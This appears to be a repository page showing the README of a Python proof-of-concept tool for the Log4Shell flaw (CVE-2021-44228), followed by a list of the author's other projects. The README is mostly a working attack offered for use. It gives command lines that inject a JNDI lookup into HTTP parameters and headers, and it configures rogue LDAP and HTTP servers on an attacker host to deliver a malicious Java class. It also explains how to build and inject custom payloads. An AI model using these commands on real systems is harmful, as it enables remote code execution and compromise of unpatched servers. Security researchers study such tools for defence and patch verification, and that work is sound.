alexandre-lavoie/python-log4rce alexandre-lavoie/python-log4rce

  • Stars
    star
    174
  • Rank 219,104 (Top 5 %)
  • Language
    Python
  • License
    MIT License
  • Created almost 3 years ago
  • Updated almost 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
alexandre-lavoie/python-log4rce
github

alexandre-lavoie

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

An All-In-One Pure Python PoC for CVE-2021-44228

Python Log4RCE

An all-in-one pure Python3 PoC for CVE-2021-44228.

Sample

> python3 log4rce.py --target "linux" --payload "PAYLOAD" http -X POST --url "http://localhost:8080/" --data "address=###"
INFO:HTTP:Running on local port 1337
INFO:HTTP:Remote target is http://127.0.0.1:1337/LinuxExploit.class
INFO:LDAP:Running on local port 1387
INFO:Log4J:Sending payload to http://localhost:8080/
INFO:LDAP:Query from ('127.0.0.1', 42554)
INFO:HTTP:Request from ('127.0.0.1', 55328) to /LinuxExploit.class
INFO:Log4J:Done!

Usage

This is a CLI tool. All options can be found in the help menu:

python3 log4rce.py --help

The list is pretty extensive, therefore the following will give you a summary of the functionality.

Attack Modes

The tool allows you to use a few attack modes. These attacks are extensions of the Log4RCE class.

HTTP

You can perform an automated HTTP request attack on a target URL.

You can perform a GET request as follows:

python3 log4rce.py http --url "http://www.vuln.com:1234/?vuln_param=###&param=123" --headers="P1=123&P2=123"

You can perform a POST request as follows:

python3 log4rce.py http -X POST --url "http://www.vuln.com:1234/" --data "vuln_param=###&param=123" --headers="P1=123&P2=123"

The previous will inject the JNDI tag into ###.

Manual

If you cannot use any of the previous, use this mode to dump the JDNI tag:

python3 log4rce.py manual

Network Settings

The tool allows extensive customization for most network configuration. All the internal servers can be modified to point to different locations according the the remote settings.

HTTP Server

You can configure the HTTP server using the following parameters:

python3 log4rce.py --http_port 1234 --http_rport 12345 --http_host "attacker.com"
http_port: The local port to run the server on.
http_rport: The port that a remote machine accesses.
http_host: The host name/IP a remote machine accesses.

LDAP Server

You can configure the LDAP server using the following parameters:

python3 log4rce.py --ldap_port 1234 --ldap_rport 12345 --ldap_host "attacker.com"
ldap_port: The local port to run the server on.
ldap_rport: The port that a remote machine accesses.
ldap_host: The host name/IP a remote machine accesses.

Customization

The tool allows can handle some customization. The following lists some functionality you may be interested in.

Injecting Payload

You can inject a payload into the Java class using:

python3 log4rce.py --payload "PAYLOAD"

The payload will be injected into "###" strings.

Custom Java Payload

You can build your own Java class using the following.

javac -source 1.7 -target 1.7 /path/to/Exploit.java

The resulting .class can be run using:

python3 log4rce.py --java_class "/path/to/Exploit.class" ...

Note: You can add a string "###" to allow payload injection.

More Repositories

1

ctf-tools

List of tools for CTFs
4
star
2

deep-physics

Intuitive Physics of Dynamic Environments using DNNs, GANs, and RNNs
Jupyter Notebook
3
star
3

nimng

Retro game engine for Nim
C
2
star
4

ctf_dump

Dump of CTF tools and scripts
Python
1
star
5

exploit.me

Be the hacker
TypeScript
1
star
6

arduino-slide

Uses the arduino ultrasonic sensor to produce sounds on an attached speaker. Other useful inclusion will also be included.
C++
1
star
7

moon

A re-implementation of P. Grogono's Moon Processor
TypeScript
1
star
8

assembly-lisp

Assembly Inspired Coding using Common Lisp
Common Lisp
1
star
9

mips-emulator

MIPS Emulator
Rust
1
star
10

mcgillhack2019

Repository for McGill Hackathon 2019
C#
1
star
11

ctf-builder

Tool to build, test, and deploy CTFs.
Python
1
star